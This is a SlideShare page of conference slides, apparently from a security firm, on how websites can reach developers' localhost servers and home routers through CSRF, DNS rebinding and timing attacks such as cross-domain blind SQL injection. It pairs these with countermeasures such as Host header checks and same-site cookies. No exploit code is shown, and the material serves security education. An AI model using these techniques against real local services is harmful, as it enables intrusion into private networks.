SlideShare une entreprise Scribd logo

Hacking Vulnerable Websites to Bypass Firewalls

Netsparker
Netsparker

These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo

Technologie
1  sur  23
Télécharger pour lire hors ligne
"Running vulnerable code in local networks" || "how to get pwned by any website" 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1
The web is broken! Insecure standards, protocols and plugins ● WebRTC ● Leaks real IP behind VPN ● Can scan the local network ● SVG ● Not always blocked in picture uploads ● Leads to stored XSS, various filter bypasses, could be used to bypass CSP nonces ● Flash ● Unofficial competition between Flash and Firefox who gets most CVEs for code execution ● Exploit kit coder's choice
SOP is too permissive ● Cross Site History Manipulation (XSHM) ● Load images and scripts from any domain ● Frame all the web sites ● But X-Frame-options?! ■ Still leaks page loading times ■ In some cases window.open() also does the job ● Does NOT prevent making requests ONLY prevents receiving responses ● Cookies are sent by default
Are authenticated cross-origin requests necessary? ● Sending cookies when including remote images? ● Sending cookies when submitting forms to another website? ● Necessary? Sometimes. ● Should it be the default behaviour? Please no! ● Sending cookies with GET requests? ● There's not really a way around it ● Would annoy users
The Problem ● Users don't want to trade too much comfort for security ● It's up to developers to implement counter measures for those shortcomings ■ CSRF Tokens ■ Same-Site Cookies ■ Checks for Origin header (web sockets) ● Developers don't want to trade too much comfort for security ● SOP is the enemy ■ crossdomain.xml ■ postMessage ■ CORS ■ JSONP
That's nothing new ● We know we should use strong passwords and 2FA ● We should implement every possible counter measure for permissive SOP and other browser "features" ● We should not run insecure code in production ● We need to update our software
We all follow those guidelines Except when we don't well...
Let me explain At what point do you consider your code as publicly accessible? ● While coding ● In your private repository ● In your testing environment ● In production ✔ ✔ X
Wait what? ● My web server binds to 127.0.0.1! ● Other servers used for testing are behind a firewall! ● I am the only one who has access to my code! ● Windows Defender is up and running, so I don't even know why I watch this presentation!11
You forget about your biggest attack surface To hack your local application attackers can use ● CSRF ● DNS rebinding ● XSHM and similar attacks ● Timing side channels
Security guidelines Now tell me again, at every stage of your web app development: ● Use strong passwords / 2FA / authentication? ● Exploitable through DNS rebinding, XSHM, CSRF ● Protect against CSRF? ● Exploitable through - well - CSRF ■ Also XSHM ■ Doesn't matter for DNS rebinding anyway if it's unauthenticated / passwords are guessable ● Only run secure code? ● As hacker or security researcher? ■ Get another job. ● As a developer? ■ I have some small doubts here
Hacking the dev? Why not the server? ● Developers are the more valuable target when ● They have a copy of production data or access to backups ● They have access to other internal systems ● Production server is secured ● Their private movie collection is big enough (Critical mass > 500 GB) ● There might be multiple sites the developer is responsible for ● The application is announced but not online yet (startups, new features in existing sites) ● There's a higher chance * to find buggy code in a development environment ● * Except if you develop the facebook messenger for android, chances should be equal then
But I'm not a developer Good point. No testing environment, no vulnerable applications, right? ● Applications that run web apps on your computer ● Management interfaces ● websockets to exchange data between website and client ● Other devices in your network ● Your internet connected fidget spinner (or whatever monstrosity kickstarter creates next) ● NAS management interface ● One web interface almost every consumer has in the network ● Vulnerable home Router
DEMO TIME
Well, this is bad "That was a lucky guess with the default password. And stuff like an SQL injection can't be abused just with CSRF while you are cross-domain." ● Completely right ● You can't read the response of a request ● You can't add data if it's a SELECT query ● OOB exfiltration is not possible without proper privileges ■ Conclusion: My data is safe! XXX WRONG ● Oh come on, this is starting to get annoying ● Just because it is annoying. If you assume anything regarding SOP it's most likely wrong ● What's the matter now? How can an attacker possibly abuse an SQL injection through the victim's browser even though there's SOP in place?
We've talked about them before: iframes! Iframes can be used to extract data from an SQL injection ● Well, not only iframes, but also <img>, xhr and even the websocket API ● The problem? Leaking page loading times ● So what? ● SQL injection + delayed page loading time = ? ● Right. We can abuse blind SQL injections cross-domain! ● Seems like it's...
DEMO TIME
Well, this is bad too But what are the alternatives? ● Running your code in a VM ● Separation, but not that practical ● Can still lead to compromise of host machine or other machines in the network ● Code can be modified ● Don't visit the internet while you code ● ● Your code might require an active internet connection
Is there any way to be safe? DNS Rebinding ● Side Effect: ● New host header ■ Shared hosting not vulnerable (only the default host) ■ We can whitelist the original host header ● Is it preventable? ● Yes. Either on application or server level (preferred). ● If the host header doesn't match a whitelisted value -> 403. ● Works for apache, IIS, nginx
Is there any way to be safe? CSRF ● Problem: ● There might be no authentication yet ■ Critical functions might be exposed for everyone ■ No CSRF protection added yet ● You audit vulnerable code without CSRF protection at all ● There is not an easy solution for this ● Using frameworks ● Starting with ■ CSRF protection ■ Authentication MEH
Is there any way to be safe? (Experimental) Universal CSRF Protection in your environment? Conveniently possible for PHP apps ● First: Create a file with the following content:
Is there any way to be safe? Halfway done ● Next: Add the file to the PHP.ini directive auto_prepend_file ● This will automatically include the file whenever any PHP file is parsed. This works in a similar fashion as PHP's require(). ● This means, whenever a web page is opened it will ● Load the PHP file ● Check if a cookie with the name "access" is set ■ If it's not, it will just throw an error, set the cookie and stop execution ■ If it is, the file does nothing and doesn't interfere with your code ● Since it's a same site cookie requests can only be made from the same domain
Conclusion Don't rely on SOP doing the right thing ● Everything we talked about is preventable, countermeasures are just not always well known ● Developers and Security Researchers should keep in mind that their testing environments are publicly accessible to a certain degree ● Even the average user is at risk. Passwords for routers should be strong and unique like every other password ● SOP alone is not going to save you

Recommandé

Same-origin Policy (SOP)
Same-origin Policy (SOP)Same-origin Policy (SOP)
Same-origin Policy (SOP)Netsparker
 
Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Make CSRF Again
Make CSRF AgainMake CSRF Again
Make CSRF AgainNetsparker
 
Scaling-up and Automating Web Application Security Tech Talk
Scaling-up and Automating Web Application Security Tech TalkScaling-up and Automating Web Application Security Tech Talk
Scaling-up and Automating Web Application Security Tech TalkNetsparker
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPPaul Ionescu
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode reviewAnant Shrivastava
 
Security Testing - Zap It
Security Testing - Zap ItSecurity Testing - Zap It
Security Testing - Zap ItManjyot Singh
 

Recommandé

Same-origin Policy (SOP)
Same-origin Policy (SOP)Same-origin Policy (SOP)
Same-origin Policy (SOP)Netsparker
 
Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Make CSRF Again
Make CSRF AgainMake CSRF Again
Make CSRF AgainNetsparker
 
Scaling-up and Automating Web Application Security Tech Talk
Scaling-up and Automating Web Application Security Tech TalkScaling-up and Automating Web Application Security Tech Talk
Scaling-up and Automating Web Application Security Tech TalkNetsparker
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPPaul Ionescu
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode reviewAnant Shrivastava
 
Security Testing - Zap It
Security Testing - Zap ItSecurity Testing - Zap It
Security Testing - Zap ItManjyot Singh
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackRan Bar-Zik
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack ProxyFadi Abdulwahab
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomationLinkesh Kanna Velu
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolDavid Sweigert
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpressn|u - The Open Security Community
 
Client-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesClient-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesOry Segal
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron securityOWASP
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)Mikal Villa
 

Contenu connexe

Tendances

Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackRan Bar-Zik
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolDavid Sweigert
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Client-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesClient-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesOry Segal
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron securityOWASP
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
 

Tendances (20)

Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learned
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stack
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack Proxy
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing tool
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
 
Client-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesClient-side JavaScript Vulnerabilities
Client-side JavaScript Vulnerabilities
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applications
 

Similaire à Hacking Vulnerable Websites to Bypass Firewalls

Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)Mikal Villa
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level MalwareCTruncer
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBakry3
 
Wordpress security
Wordpress securityWordpress security
Wordpress securityMehmet Ince
 
How to get started with Site Reliability Engineering
How to get started with Site Reliability EngineeringHow to get started with Site Reliability Engineering
How to get started with Site Reliability EngineeringAndrew Kirkpatrick
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
Joomla Code Quality Control and Automation Testing
Joomla Code Quality Control and Automation TestingJoomla Code Quality Control and Automation Testing
Joomla Code Quality Control and Automation TestingShyam Sunder Verma
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDDaniel Garcia (a.k.a cr0hn)
 
Introduce native client
Introduce native clientIntroduce native client
Introduce native clientYoung-Ho Cha
 
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...Serdar Basegmez
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows Ron Munitz
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0Itzik Kotler
 

Similaire à Hacking Vulnerable Websites to Bypass Firewalls (20)

Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)TSC Summit #4 - Howto get browser persitence and remote execution (JS)
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level Malware
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD
 
Wordpress security
Wordpress securityWordpress security
Wordpress security
 
How to get started with Site Reliability Engineering
How to get started with Site Reliability EngineeringHow to get started with Site Reliability Engineering
How to get started with Site Reliability Engineering
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
Joomla Code Quality Control and Automation Testing
Joomla Code Quality Control and Automation TestingJoomla Code Quality Control and Automation Testing
Joomla Code Quality Control and Automation Testing
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CD
 
Introduce native client
Introduce native clientIntroduce native client
Introduce native client
 
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...
Engage 2022: The Superpower of Integrating External APIs for Notes and Domino...
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
Nodejs
NodejsNodejs
Nodejs
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
 

Dernier

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 

Dernier (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
